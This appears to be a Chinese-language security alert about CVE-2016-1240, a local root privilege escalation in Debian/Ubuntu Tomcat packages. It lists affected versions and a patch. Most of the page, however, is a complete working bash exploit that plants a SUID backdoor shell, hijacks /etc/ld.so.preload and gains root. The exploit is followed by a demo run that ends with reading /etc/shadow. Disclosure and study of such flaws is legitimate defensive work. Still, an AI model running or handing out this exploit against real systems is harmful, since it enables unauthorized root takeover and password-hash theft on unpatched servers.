2. 程式人生 > >漏洞預警:Tomcat曝本地提權漏洞

漏洞預警:Tomcat曝本地提權漏洞

阿新 發佈:2019-01-23

Tomcat於10月1日曝出本地提權漏洞CVE-2016-1240。僅需Tomcat使用者低許可權,攻擊者就能利用該漏洞獲取到系統的ROOT許可權。而且該漏洞的利用難度並不大,受影響的使用者需要特別關注。

Tomcat是個執行在Apache上的應用伺服器,支援執行Servlet/JSP應用程式的容器——可以將Tomcat看作是Apache的擴充套件,實際上Tomcat也可以獨立於Apache執行。

漏洞編號:

CVE-2016-1240

影響範圍:

Tomcat 8 <= 8.0.36-2

Tomcat 7 <= 7.0.70-2

Tomcat 6 <= 6.0.45+dfsg-1~deb8u1

受影響的系統包括Debian、Ubuntu,其他使用相應deb包的系統也可能受到影響。

修復方案:

Debian安全團隊已經修復了受影響的包;更新至系統提供的最新版Tomcat包即可。

漏洞概述:

Debian系統的Linux上管理員通常利用apt-get進行包管理,CVE-2016-1240這一漏洞其問題出在Tomcat的deb包中,使 deb包安裝的Tomcat程式會自動為管理員安裝一個啟動指令碼:/etc/init.d/tocat* 利用該指令碼,可導致攻擊者通過低許可權的Tomcat使用者獲得系統root許可權!

# Run the catalina.sh script as a daemon

set +e

touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out

chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out

本地攻擊者,作為tomcat使用者(比如說,通過web應用的漏洞)若將catalina.out修改為指向任意系統檔案的連結,一旦Tomcat init指令碼(ROOT許可權執行)在服務重啟後再次開啟catalina.out檔案,攻擊者就可獲取ROOT許可權。

漏洞PoC:

#!/bin/bash
#
# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit
 

#
# CVE-2016-1240
#
# Discovered and coded by:
#
# Dawid Golunski
# http://legalhackers.com
#
# This exploit targets Tomcat (versions 6, 7 and 8) packaging on 
# Debian-based distros including Debian, Ubuntu etc.
# It allows attackers with a tomcat shell (e.g. obtained remotely through a 
# vulnerable java webapp, or locally via weak permissions on webapps in the 
# Tomcat webroot directories etc.) to escalate their privileges to root.
#
# Usage:
# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]
#
# The exploit can used in two ways:
#
# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly
# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted. 
# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up
# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)
#
# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to 
# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting. 
# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a 
# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can
# then add arbitrary commands to the file which will be executed with root privileges by 
# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default 
# Ubuntu/Debian Tomcat installations).
#
# See full advisory for details at:
# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html
#
# Disclaimer:
# For testing purposes only. Do no harm.
#

BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/tomcatrootsh"
PRIVESCLIB="/tmp/privesclib.so"
PRIVESCSRC="/tmp/privesclib.c"
SUIDBIN="/usr/bin/sudo"

function cleanexit {
    # Cleanup 
    echo -e "\n[+] Cleaning up..."
    rm -f $PRIVESCSRC
    rm -f $PRIVESCLIB
    rm -f $TOMCATLOG
    touch $TOMCATLOG
    if [ -f /etc/ld.so.preload ]; then
        echo -n > /etc/ld.so.preload 2>/dev/null
    fi
    echo -e "\n[+] Job done. Exiting with code $1 \n"
    exit $1
}

function ctrl_c() {
        echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."
    cleanexit 0
}

#intro 
echo -e "\033[94m \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\nCVE-2016-1240\n"
echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m"

# Args
if [ $# -lt 1 ]; then
    echo -e "\n[!] Exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n"
    exit 3
fi
if [ "$2" = "-deferred" ]; then
    mode="deferred"
else
    mode="active"
fi

# Priv check
echo -e "\n[+] Starting the exploit in [\033[94m$mode\033[0m] mode with the following privileges: \n`id`"
id | grep -q tomcat
if [ $? -ne 0 ]; then
    echo -e "\n[!] You need to execute the exploit as tomcat user! Exiting.\n"
    exit 3
fi

# Set target paths
TOMCATLOG="$1"
if [ ! -f $TOMCATLOG ]; then
    echo -e "\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\n"
    exit 3
fi
echo -e "\n[+] Target Tomcat log file set to $TOMCATLOG"

# [ Deferred exploitation ]

# Symlink the log file to /etc/default/locale file which gets executed daily on default
# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.
# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been
# restarted and file owner gets changed.
if [ "$mode" = "deferred" ]; then
    rm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG
    if [ $? -ne 0 ]; then
        echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."
        cleanexit 3
    fi
    echo -e  "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"
    echo -e  "\n[+] The current owner of the file is: \n`ls -l /etc/default/locale`"
    echo -ne "\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot"
    echo -ne "\n    you'll be able to add arbitrary commands to the file which will get executed with root privileges"
    echo -ne "\n    at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait  \n\n"
    exit 0
fi

# [ Active exploitation ]

trap ctrl_c INT
# Compile privesc preload library
echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
cat <<_solibeof_>$PRIVESCSRC
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dlfcn.h>
uid_t geteuid(void) {
    static uid_t  (*old_geteuid)();
    old_geteuid = dlsym(RTLD_NEXT, "geteuid");
    if ( old_geteuid() == 0 ) {
        chown("$BACKDOORPATH", 0, 0);
        chmod("$BACKDOORPATH", 04777);
        unlink("/etc/ld.so.preload");
    }
    return old_geteuid();
}
_solibeof_
gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl
if [ $? -ne 0 ]; then
    echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."
    cleanexit 2;
fi

# Prepare backdoor shell
cp $BACKDOORSH $BACKDOORPATH
echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"

# Safety check
if [ -f /etc/ld.so.preload ]; then
    echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."
    cleanexit 2
fi

# Symlink the log file to ld.so.preload
rm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG
if [ $? -ne 0 ]; then
    echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."
    cleanexit 3
fi
echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"

# Wait for Tomcat to re-open the logs
echo -ne "\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart..."
echo -e  "\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed  "
while :; do 
    sleep 0.1
    if [ -f /etc/ld.so.preload ]; then
        echo $PRIVESCLIB > /etc/ld.so.preload
        break;
    fi
done

# /etc/ld.so.preload file should be owned by tomcat user at this point
# Inject the privesc.so shared library to escalate privileges
echo $PRIVESCLIB > /etc/ld.so.preload
echo -e "\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \n`ls -l /etc/ld.so.preload`"
echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"

# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"
sudo --help 2>/dev/null >/dev/null

# Check for the rootshell
ls -l $BACKDOORPATH | grep rws | grep -q root
if [ $? -eq 0 ]; then 
    echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
    echo -e "\n\033[94mPlease tell me you're seeing this too   \033[0m"
else
    echo -e "\n[!] Failed to get root"
    cleanexit 2
fi

# Execute the rootshell
echo -e "\n[+] Executing the rootshell $BACKDOORPATH now! \n"
$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
$BACKDOORPATH -p

# Job done.
cleanexit 0

Poc執行示例:

[email protected]u:/tmp$ id
uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)

[email protected]:/tmp$ lsb_release -a
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu 16.04 LTS
Release:	16.04
Codename:	xenial

[email protected]:/tmp$ dpkg -l | grep tomcat
ii  libtomcat7-java              7.0.68-1ubuntu0.1               all          Servlet and JSP engine -- core libraries
ii  tomcat7                      7.0.68-1ubuntu0.1               all          Servlet and JSP engine
ii  tomcat7-common               7.0.68-1ubuntu0.1               all          Servlet and JSP engine -- common files

[email protected]:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out 
 
Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit
CVE-2016-1240

Discovered and coded by: 

Dawid Golunski 

http://legalhackers.com

[+] Starting the exploit in [active] mode with the following privileges: 
uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)

[+] Target Tomcat log file set to /var/log/tomcat7/catalina.out

[+] Compiling the privesc shared library (/tmp/privesclib.c)

[+] Backdoor/low-priv shell installed at: 
-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh

[+] Symlink created at: 
lrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload

[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...
You could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed 
 

[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: 
-rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload

[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload

[+] The /etc/ld.so.preload file now contains: 
/tmp/privesclib.so

[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!

[+] Rootshell got assigned root SUID perms at: 
-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh

Please tell me you're seeing this too   

[+] Executing the rootshell /tmp/tomcatrootsh now! 

tomcatrootsh-4.3# id
uid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7)
tomcatrootsh-4.3# whoami
root
tomcatrootsh-4.3# head -n3 /etc/shadow
root:$6$oaf[cut]:16912:0:99999:7:::
daemon:*:16912:0:99999:7:::
bin:*:16912:0:99999:7:::
tomcatrootsh-4.3# exit
exit

相關推薦

漏洞預警Tomcat本地漏洞

Tomcat於10月1日曝出本地提權漏洞CVE-2016-1240。僅需Tomcat使用者低許可權,攻擊者就能利用該漏洞獲取到系統的ROOT許可權。而且該漏洞的利用難度並不大,受影響的使用者需要特別關注。 Tomcat是個執行在Apache上的應用伺服器,支援執行Ser

Tomcat本地漏洞 (CVE-2016-1240 附PoC)

就在各位歡度國慶的時候,Tomcat於10月1日曝出本地提權漏洞CVE-2016-1240。僅需Tomcat使用者低許可權,攻擊者就能利用該漏洞獲取到系統的ROOT許可權。而且該漏洞的利用難度並不大,受影響的使用者需要特別關注。 Tomcat是個執行在Apache上的應用伺

Tomcat 服務本地漏洞預警

10月1日,Tomcat爆出了一個本地提權漏洞。通過該漏洞,攻擊者可以通過一個低許可權的Tomcat使用者獲得系統的root許可權。漏洞相關資訊:CVE ID:CVE-2016-1240漏洞原理:在Debian系統的Linux上管理員通常利用apt-get進行包管理,deb包

CVE-2016-1240漏洞分析(Tomcat本地漏洞

前幾天刷Freebuf的時候發現了在國慶期間爆了一個Tomcat本地提權漏洞,乍一看漏洞利用指令碼是一個shell批處理,想著也不會太難,就抱著學習的目的試著做了分析。以下是本人的分析學習總結。 0x0 漏洞描述     Debian系統的Linux上管理員通常利用apt-

CVE-2016-1240(Tomcat本地漏洞分析與復現)

前言       Tomcat是個執行在Apache上的應用伺服器,支援執行Servlet/JSP應用程式的容器——可以將Tomcat看作是Apache的擴充套件,實際上Tomcat也可以獨立於Apache執行。        Tomcat於2016年10月1日曝出本地提權漏

重大安全事件 | Ubuntu 16.04.4 暴本地漏洞

漏洞簡介Twitter 上 Nikolenko 發推表示 Ubuntu 最新版本存在一個本地提權

CVE-2014-7911 Android本地漏洞分析與利用

概述 前面我們瞭解了Android Binder機制的基本原理,當然僅僅瞭解是不夠的,我們要做到:Know it and hack it。這篇文章我們就來分析一個和Binder相關的漏洞:CVE-2014-7911。這是由Jann Horn發現的一個Android本

臟牛Linux本地漏洞復現(CVE-2016-5195)

cin 實現 ubun pass 進入 函數 dirty 賬號密碼 swd 學習該漏洞的原因: 總是看到圈子裏一位老哥發文章使用這個漏洞來提權,進過測試發現centos比較難提取,而Ubuntu是比較好提權的。 漏洞範圍: Linux kernel >= 2.6.22

技術乾貨丨Java Web本地以及資料劫持思路(以Tomcat為例)

最近偶然接觸到一個Java的不常用的特性:instrument。簡單來說,這個特性允許你在程式執行之前改變任意類檔案的位元組碼。 簡單的instrument例子大家可以百度,相當多。 而在執行Java程式的時候,只需要加上一個選項即可執行寫好的instrument jar包,如:java -javaa

高危預警 | Windows核心漏洞(CVE-2018-1038)

2018年3月30日,阿里云云盾應急響應中心監測到微軟官方釋出Windows7 x64 和 Windows Server 2008 R2安全補丁(CVE-2018-1038),解決使用者在2018年1月-3月期間因安裝微軟安全補丁而導致系統存在高危核心提權漏洞的問題。

Ubuntu 16.04 漏洞

Ubuntu 提權 Oday Ubuntu 提權漏洞 下午閑來沒事,朋友扔給我一個Ubuntu 提權exp 親測可用,記錄下 /* Ubuntu 16.04.4 kernel priv esc all credits to @bleidl vnik*/ // Tested on:/

CVE-2018-8120 WIN7 08漏洞exp

提權漏洞exp在虛擬機測試成功影響範圍Win7 x32, Win7 x64, Win2008 x32, Win2008 R2 x32, Win2008 R2 x64.exphttp://www.o2oxy.cn/wp-content/uploads/2018/05/CVE-2018-8120.zipCVE-2

Ubuntu本地(CVE-2017-16995)復現

面向新手,大佬勿噴 漏洞概述 2018-03-16有網友釋出訊息:ubuntu 最新版本(Ubuntu 16.04)存在高危的本地提權漏洞,漏洞編號為CVE-2017-16995。該漏洞存在於呼叫eBPF bpf(2)的Linux核心系統中,當用戶提供惡意BPF程式使eBPF驗證器模組產生計算錯誤,導致任

【10.20總結】一個漏洞提交頁面的漏洞

!!!寫完之後網頁崩潰了,然後草稿找回的內容還不對!!! Write-up地址:Add comment on a private Oculus Developer bug report  漏洞起源於作者Sarmad Hassan (Juba Baghdad)對Oculus網站漏洞(非安全漏洞

修復網站漏洞對phpmyadmin防止被入侵的解決辦法

phpmyadmin是很多網站用來管理資料庫的一個系統,尤其是mysql資料庫管理的較多一些,最近phpmysql爆出漏洞,尤其是弱口令,sql注入漏洞,都會導致mysql的資料賬號密碼被洩露,那麼如何通過phpmyadmin來上傳提權webshell呢 首先我們來搭建一下PHP+mysql環境,lin

墨者學院 - 主機溢位漏洞分析

背景介紹 公司內部伺服器,上面有一簡單的上傳入口,剛入職的小夥伴在C盤根目錄下有一個TXT文字檔案,說許可權設定的很低,除Administrator外,其他使用者無法讀取到內容,直接向安全工程師"墨者"發出挑戰,讓其測試。 實訓目標 1、掌握檔案上傳的技巧; 2、掌握IIS中

關於Kubernetes CVE-2018-1002105 漏洞的修復公告

近日Kubernetes社群發現安全漏洞 CVE-2018-1002105。通過偽造請求,Kubernetes使用者可以在已建立的API Server連線上提權訪問後端服務,阿里雲容器服務已第一時間修復,請登入阿里雲控制檯升級您的Kubernetes版本。 漏洞詳細介紹:https://github.com

Windows 10 漏洞復現及武器化利用

專案地址:https://github.com/SandboxEscaper/randomrepo 相關工具的下載地址: Process Explorer:https://docs.microsoft.com/en-us/sysinternals/downloads/pr

漏洞預警DB2資料庫存在執行任意程式碼漏洞

近日安華金和資料庫***實驗室,又發現了一個DB2資料庫漏洞。 DB2資料庫存在執行任意程式碼漏洞,由不正確的邊界檢查,db2pdcfg容易受到基於堆疊的緩衝區溢位的影響,允許***者執行任意程式碼。   漏洞詳情披露如下: CVEID: CVE-2018-1897 高危 DESCRI

主機溢位漏洞分析

背景介紹 公司內部伺服器,上面有一簡單的上傳入口,剛入職的小夥伴在C盤根目錄下有一個TXT文字檔案,說許可權設定的很低,除Administrator外,其他使用者無法讀取到內容,直接向安全工程師"墨者"發出挑戰,讓其測試。 實訓目標 1、掌握檔案上傳的技巧; 2